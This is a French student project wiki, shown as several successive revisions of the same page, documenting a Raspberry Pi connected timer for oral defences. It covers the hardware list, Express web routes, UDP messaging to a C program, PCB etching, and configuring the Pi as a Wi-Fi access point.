Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49393P4 IOT 20182019-01-20T22:02:12Z<p>Mcreteur : /* Séance 5 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
==Séance 3==<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49392P4 IOT 20182019-01-20T21:38:20Z<p>Mcreteur : /* Recherche d'un sujet et clarification du cahier des charges */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
==Séance 3==<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49391P4 IOT 20182019-01-20T21:37:50Z<p>Mcreteur : /* Séance 1 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
- Un système de vote sera disponible à partir de l'application<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
==Séance 3==<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
==Séance 4==<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49390P4 IOT 20182019-01-20T20:47:56Z<p>Mcreteur : /* Réalisation */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
